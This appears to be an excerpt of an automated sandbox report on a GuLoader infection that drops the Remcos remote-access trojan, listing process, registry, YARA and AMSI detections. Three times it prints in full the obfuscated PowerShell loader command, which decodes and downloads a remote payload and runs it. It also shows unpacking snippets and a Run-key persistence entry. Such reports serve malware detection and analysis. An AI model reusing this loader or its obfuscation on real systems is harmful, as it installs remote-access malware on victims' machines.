              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1700456681.0000021385281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698077766.0000021385081000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+m source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2019662882.0000000003564000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2049592368.0000000007B66000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", ""echo $Telekabler; function Katukina($F", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Idyxkataloger)$gloBaL:jAVAnee67 = [SysTeM.teXt.eNCOdInG]::asCiI.GETsTRing($PRoREX)$gLobaL:kAlDaEere=$jaVaneE67.sUBsTRiNg($planETA,$makrOKaLdEne218)<#Retruded Masseproduceredes Rekapi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nonmature $anseendetyttefelt $Tmrerblyanter), (Prerealisation @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bravaders = [AppDomain]::CurrentDomain.GetAss
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fisen)), $anseendetortfrernes).DefineDynamicModule($Enoghalvtreds56, $false).DefineType($Militariser, $regnskabsmodeller, [System.Mult
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Idyxkataloger)$gloBaL:jAVAnee67 = [SysTeM.teXt.eNCOdInG]::asCiI.GETsTRing($PRoREX)$gLobaL:kAlDaEere=$jaVaneE67.sUBsTRiNg($planETA,$makrOKaLdEne218)<#Retruded Masseproduceredes Rekapi
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetArugeJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F8ADC Sleep,LoadLibraryW,GetProcAddress,9_2_001F8ADC
              Source: remcos.exe.8.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7651F5 push eax; ret 1_2_00007FFD9B765251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7600AD pushad ; iretd 1_2_00007FFD9B7600C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3369B push ebx; iretd 3_2_04E336DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3D75E pushad ; ret 3_2_04E3D761
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04E3DA0C pushfd ; ret 3_2_04E3DA0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D02CA7 pushad ; retf 3_2_07D02CF9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D093FB push FFFFFF8Bh; iretd 3_2_07D0940A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D09C3C push FFFFFF8Bh; iretd 3_2_07D09C45
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0470 push ecx; iretd 8_2_044D0477
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D1E72 push eax; retf 8_2_044D1E89
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0E00 pushad ; ret 8_2_044D0E01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D4CD7 push esp; ret 8_2_044D4CD9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0EE4 pushad ; ret 8_2_044D0ED1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D3480 push esp; retf 8_2_044D3488
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0890 push esp; retf 8_2_044D08F3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D4A93 push ds; ret 8_2_044D4AAE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D04A4 push esp; ret 8_2_044D04AD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D0EA6 pushad ; ret 8_2_044D0ED1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D437B push esp; iretd 8_2_044D4381
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D2B0E push esp; ret 8_2_044D2B45
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D290B push 3ACA1D5Bh; iretd 8_2_044D2912
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D3D04 push esp; ret 8_2_044D3D05
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D17C0 push ds; ret 8_2_044D17C6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D2F8B push 00000047h; ret 8_2_044D2F8D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D239E push esp; iretd 8_2_044D239F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D35AC push ds; ret 8_2_044D35AE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D25A8 push ds; ret 8_2_044D25AA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D35A7 push 00000023h; retf 8_2_044D35A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044D45BA push es; iretd 8_2_044D45BB
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F9F2D push ecx; ret 9_2_001F9F40
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious names
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F7DD0 StartServiceCtrlDispatcherW,GetLastError,9_2_001F7DD0
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
